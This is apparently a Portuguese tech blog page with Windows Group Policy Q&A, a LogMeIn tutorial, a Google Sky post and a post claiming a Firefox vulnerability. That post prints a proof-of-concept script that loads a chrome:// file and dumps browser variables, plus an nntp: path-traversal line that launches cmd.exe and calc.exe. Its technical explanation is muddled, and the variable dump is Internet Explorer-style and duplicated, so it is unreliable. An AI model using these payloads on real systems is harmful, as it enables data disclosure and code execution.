1ª - Gostaria de bloquear a unidade C: para que o usuario não possa alterar nada e nem salvar nada na pasta. So quero que o usuario salve arquivos no meus documentos, e unidade que eu criei para ele.
Como eu faço isso ?
Eu achei uma opção na configuração da GPO. Mas ela faz com o usuario nem consiga abrir o C: consequentemente os meus documentos. Pode me ajudar ?
2ª - Eu também gostaria de bloquear as ferramentas administrativas do painel de controle ? Eu ja removi alguns itens do painel de controle como fontes e video, pelo GPO, mas ferramentas administrativas ainda nao consegui. Pode me ajudar ? Como eu faço ?
3ª - As configurações de conteudo que são feitas nos sites restritos das opções de internet. Vale apenas para o internet explorer, ou funciona no firefox tambem ? HE automativo para o firefox ?
4ª - Eu vi em um forum do orkut, uma mensagem falando que o tempo para o servidor via windows server atualizar os parametros de configuração alterados podem duras horas e ate dias ? Como isso funciona, pq todas as modificações que eu faço no meu servidor, automaticamente toda a minha rede ja recebe essa configuração. Como he isso ? Ate q ponto isso funciona ? Pode me expliacar ? Oq eu estou escrevendo ; he isso mesmo ? ou estou errado.
Explicações e soluções
1ª - A configuração na GPO bloqueia a unidade inteira mesmo. Este tipo de restrição inclui a pasta Meus Documentos, óbvio.
Para que o bloqueio seja somente na pasta raiz, devemos fazer manualmente, máquina por máquina, através das diretivas de segurança NTFS da unidade. Dá trabalho... Acessando a unidade C do computador com login administrativo, clique com o botão direito do mouse e escolha Propriedades/Segurança. A seguir, marque os itens Ler e Executar, e proiba os demais itens. E importante, desmarque o item Propagar as alterações para as pastas subordinadas (filhas).
Outra forma de 'bloqueio', forçando o usuário a utilizar sempre a pasta Meus Documentos é fazer ela acompanhar o usuário, ou seja, um perfil remoto móvel. Assim a pasta fica no servidor e não mais nas estações. Se você retirar o HD e habilitar o boot remoto, os micros poderão operar como terminais burros, diminuindo custos de aquisição de HDs e facilitando a manutenção e administração da rede, pois modelos, arquivos, pastas do usuário, tudo ficará centralizado no servidor. Para outras informações sobre perfil remoto, veja
http://mediugorie.spaces.live.com/blog/cns!1E5807A6D5723B60!943.entry
2ª - As ferramentas administrativas na verdade não fazem parte diretamente do Painel de Controle. Apesar de ser referência a um arquivo CPL, o ADMINTOOLS.CPL, é um conjunto de links para outras funções. Podemos dizer que é um grupo (igual as linguagens de programação). Portanto, para impedir o acesso completo a elas, sugiro que adicione na lista de proibições de execução a linha 'CONTROL ADMINTOOLS' ou remova do menu Iniciar/Programas os links, e ainda bloqueie todo o painel de controle.
3ª - As configurações de conteúdo, sites restritos, e demais opções do Internet Explorer são exclusivas do IE mesmo. Se configuramos no servidor, bloqueia na estações normalmente. Mas o porém é o tal do FireFox. Ele não aceita as regras diretivas do IE. Logo, uma pessoa com um pen drive consegue executar o Firefox portável e entrar em sites restritos como o Orkut bloqueado. É uma falha do Windows? Talvez não. É um desleixo dos programadores de Firefox? Talvez sim. Se o programa não aceita trabalhar subordinado a regras do servidor, ele não serve para uma empresa, onde o bloqueio de sites não é apenas para garantir a produtividade, mas por questões de segurança mesmo. O bloqueio efetivo de conteúdo e sites para o Firefox só é conseguido através de um proxy, como o ISA Server ou montando um servidor Linux com IPTables e outras ferramentas de filtragem.
4ª - A configuração de REFRESH das políticas pode ser definido pelo administrador da rede. Se não é definido nada, elas entram assim que encontrar uma brecha na transmissão de dados entre o terminal e o servidor, e quando o tráfego é pequeno, praticamente de imediato. Mas se a rede possui muito tráfego, podemos definir horários específicos para que ocorra, como de madrugada, por exemplo. A definição formal do tempo do REFRESH garante a atualização igual e simultânea de toda a rede. Quando configurado com um valor baixo, ele causa tráfego desnecessário na rede, tornando-a lenta. Se estiver com um valor muito alto, as atualizações de segurança no servidor podem não ser distribuídas a tempo de evitar uma tragédia nos seus dados. O bom senso é que manda... A configuração de REFRESH está no Active Directory, última chave das políticas de usuário.
Quem precisa de tanto espaço assim? Talvez alguns chineses que moram em Taiwan, que tenham uma conexão T1 em casa, poderia justificar um espaço tão, digamos, ilimitado assim.
Primeiro foi o Google, com seu GMail a estreiar a categoria de e-mails com GBs de tamanho. A seguir, o Yahoo... Algum tempo depois, a Hotmail... E hoje, praticamente todos estão com GBs de capacidade.
Em breve a Hotmail irá para 5GB nas contas gratuitas. O UOL já oferece para assinantes (que tem que pagar mais uma taxa) e não assinantes, um e-mail com 10GB. O Yahoo diz que é ilimitado (mas o infinito não teria um certo limite físico determinado pela quantidade de TB ou YB que os servidores da Yahoo conseguiriam armazenar... controverso...).
Se você assina uma banda larga light, como o Speedy Light, com 4GB de transferência mensal, e se desejasse baixar todas as suas mensagens da Hotmail de 5GB, iria pagar MBs extras... Mas se sua conexão é ilimitada, então poderia passar o tempo todo baixando anexos de suas mensagens. E o YouTube? E o Orkut? E o MSN? Onde ficam??? Será que as empresas querem que seus usuários passem dias a fio baixando coisas do e-mail apenas???
Transformar o seu e-mail em drive virtual é tentador... Mas será que vale a pena ficar enviando e baixando arquivos manualmente? Não seria o caso de usar o LogMeIn para conexão remota. E se você assina o e-mail de 10GB do UOL ganha 150MB de disco virtual! Pera aí!!! Qualquer pen-drive de 2GB custa menos, e é muito mais portável do que depender de uma conexão de Internet. Se o Brasil tivesse conexões rápidas T1, aí sim, podemos conversar. Mas baixar 10GB via conexão de 256kbps levariam 86 horas e 40 minutos ou pouco mais de 3 dias e meio (cálculos realizados desconsiderando lag, problemas de conexão, de navegação, ou a lerdeza tradicional das sextas-feiras, inclusive nas banda-larga que não deveriam, teoricamente, dar sinal de ocupado).
Quando eu era pequeno, costumava olhar para os céus de madrugada, e tentava contar as estrelas. Acaba dormindo no telhado de casa... Depois descobri uma empresa de ônibus (Salutaris), que batizava cada um de seus carros com um nome de estrela/constelação... E agora, depois de tanto tempo, a Google me faz relembrar os tempos de criança sonhadora em Cachoeira Paulista-SP-Brasil, onde curiosamente tem o CPTEC-INPE (mas nunca tive vontade de trabalhar lá)...
O Google adicionou um novo recurso ao Google Earth chamado Sky, que permite explorar o espaço e ver as estrelas a partir de determinados pontos da Terra.
Com a nova função, os usuários podem usar o Google para observar maravilhas astronômicas como a Nebulosa do Caranguejo (Crab Nebula), os restos em expansão de uma supernova que fica a 6,3 mil anos-luz da Terra.
Marcas nas fotos das estrelas puxam textos explicativos da enciclopédia online Wikipedia. Sobreposições mostram constelações inteiras, como a de Leão, ilustram as fases da Lua e mostram como os planetas visíveis da Terra orbitam ao longo de dois meses.
O acervo de imagens cobre 100 milhões de estrelas e 200 milhões de galáxias, segundo o Google. Embora muitas das imagens já estejam disponíveis online, o Google quer torná-las mais acessíveis pelo Google Earth, até então focado em imagens de satélite da Terra. O projeto saiu da área de engenharia do Google em Pittsburgh, Pensilvânia.
Para usar o serviço, é preciso fazer um novo
download do Google Earth. O software é gratuito para usuários individuais, mas tem uma versão paga, o Earth Enterprise, que permite às empresas anexar suas próprias informações às imagens de satélite e guardar as informações no seu próprio servidor.
Após a instalação, entre no Google Earth. Clique em Visualizar, Mudar para o céu.
Baixei... Instalei... E estou passeando pelos céus, como um Ícaro, sem o perigo de cair por causa das asas que poderiam derreter (a menos que caia a minha conexão do Speedy)
Já aconteceu com você de esquecer seu minúsculo pen-drive de 4GB em casa, e quando chega no serviço percebe o problema? Todos os arquivos que passou a noite toda digitando estão lá. E agora? Se possui banda larga, não tem problemas. Basta usar o programa LogMeIn Free para acessar remotamente seu computador de casa, em qualquer outro computador que esteja conectado na Internet, via web-browser.
Aí podem dizer, é igual ao VNC!!! Tudo bem, que seja, mas é outra opção.
Procedimentos para instalação no seu computador doméstico
- Acesse o site https://secure.logmein.com/products/free/ e clique no botão Download Now.
- Você será direcionado para a tela de registro do software. Não se assuste, o programa é freeware. O registro é justamente a identificação para que você possa acessar seu computador posteriormente.
- Os dados serão transmitidos em SSL 128 bits, como em um banco. Informe o seu e-mail e uma senha (digite duas vezes). Deixe marcado para 'For my PCs'. O e-mail e senha serão usados para identificar você quando for se conectar via Internet remotamente.
- Na tela seguinte, será questionado o tipo de acesso que deseja. Mude para Free, e a seguir, se é este o seu computador que será acessado remotamente, clique em 'Add computer...'
- Se aparecer a tela de instalação, confirme. O módulo Java precisa ser instalado também.
- Pronto.
Programe a sua conexão para 'Salvar senha' e 'Conectar-se automaticamente'. Desta forma, o seu computador ficará conectado e a sua banda larga será a porta de entrada para um acesso remoto.
Agora no seu computador do serviço/escola... Acesse o site www.logmein.com e informe o seu e-mail e senha. Pronto.
Você tem a opção de transferir arquivos, assumir o controle remotamente do micro, conectar-se a impressora e tudo mais, como se estivesse na frente dele.
E um detalhe, quando se diz estar na frente dele é literalmente falando. Se remover um arquivo do computador remoto, ele fica na lixeira do computador remoto, e não desaparece sem deixar vestígios.
.
Dizem que o Firefox é seguro. Tem certeza? Mas você tem certeza mesmo?
Quando perguntamos com tanta ênfase se alguém tem certeza de algo, depois de uma reação de surpresa, certamente dirá: 'só temos certeza da morte'. Pois é. Para os defensores do Firefox como sendo um navegador seguro, ao contrário do Internet Exploer, aqui está a má notícia. Ele tem vulnerabilidades sim, iguais ao do IE.
Aí vão dizer que eu sou puxa-saco do Bill Gates. Podem falar o que quiserem, eu sei que não sou.
Explorando a vulnerabilidade é possível ler o valor de todas as variáveis armazenadas no seu Firefox (inclusive aquelas senhas de MSN, Orkut, bancos, etc). Para tanto, lembre-se que todas as variáveis armazenadas no Firefox são criadas a partir de arquivos Javascripts executados remotamente quando acessados. Mas como evitar que isto aconteça? Use a extensão Fire Encrypter - download em
http://www.softpedia.com/progDownload/Fire-Encrypter-Download-55225.html
Basicamente, a vulnerabilidade é explorada através da chave de contexto chrome:// presente em todos os arquivos JavaScript, e é criada uma sessão de acesso ao aplicativo através de uma instância Ajax. Infelizmente é possível acessar apenas funções não registradas, como as configuradas por desenvolvedores independentes. Módulo de proteção de bancos previamente instalados não podem ser explorados com esta vulnerabilidade, mas bancos sem módulos de proteção, que você acessou a partir de seu computador, sim, estes dados podem ser copiados.
A vulnerabilidade explora negação de serviço através de chamadas de funções, quebra de privacidade, exibição de informações confidenciais e é tratado como um 'ataque desconhecido'.
Como esta vulnerabilidade está na chave crhome, vai ser difícil consertar... É como se houvesse um problema no comando <html>, e todas as páginas do mundo fossem então vulneráveis da noite para o dia.
Variáveis exploradas...
onbeforeunload = null
onafterprint = null
top = [objeto]
location = [endereço URL]
parent = [objeto]
offscreenBuffering = auto
frameElement = null
onerror = null
screen = [objeto]
event = null
clipboardData = [objeto]
onresize = null
defaultStatus =
onblur = null
window = [objeto]
onload = null
onscroll = null
screenTop = 112
onfocus = null
Option = [objeto]
length = 0
onbeforeprint = null
frames = [objeto]
self = [objeto]
clientInformation =
external =
screenLeft = 204
opener = undefined
onunload = null
document = [objeto]
closed = false
history = [objeto]
Image = [objeto]
navigator =
status =
onhelp = null
name =
onbeforeunload = null
onafterprint = null
top = [objeto]
location = [endereço URL]
parent = [objeto]
offscreenBuffering = auto
frameElement = null
onerror = null
screen = [objeto]
event = null
clipboardData = [objeto]
onresize = null
defaultStatus =
onblur = null
window = [objeto]
onload = null
onscroll = null
screenTop = 112
onfocus = null
Option = [objeto]
length = 0
onbeforeprint = null
frames = [objeto]
self = [objeto]
clientInformation =
external =
screenLeft = 204
opener = undefined
onunload = null
document = [objeto]
closed = false
history = [objeto]
Image = [objeto]
navigator =
status =
onhelp = null
name =
Ah, mas eu não entendo nada do que está sendo mostrado! Calma gafanhoto. Questão de tempo e prática. Estude lógica e linguagem de programação.
Exemplo de scripts que exploram a vulnerabilidade...
<script src="chrome://global/content/config.js"></script>
<script>
// dump it
function show_all() {
var chrome = this;
for (var i in chrome) {
try {
document.writeln(i + ' = ' + chrome[i] +'<br />');
} catch(e) { }
}
}
show_all();
</script>
E ainda tem a possibilidade de execução de código remota através dos serviços SMTP, NNTP, NEWS e SNEWS.
Alguns exemplos...
nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
Dúvida recebida por mensagem aqui no Blog.
- Em primeiro lugar, verificou a data e hora de seu computador... Mantenha atualizado. Se a cada vez que você desliga a hora atrasa, troque a bateria CR2032 dele (custa R$5 em relojoeiros e lojas de fotografias).
- A seguir, estando com a hora do computador correta, baixe e atualize o Parser XML Service Pack 7 (um dos componentes do MSN)http://www.microsoft.com/downloads/details.aspx?familyid=28494391-052b-42ff-9674-f752bdca9582&displaylang=en
- Baixar e instalar a nova versão do MSN Live (se o seu Windows é XP ou Vista, mantenha o MSN atualizadíssimo).
- Não instalar addons 'desnecessários', pois comprometem a integridade da sua versão instalada, substituindo arquivos atualizados por outros mais antigos.
Tools 
Help
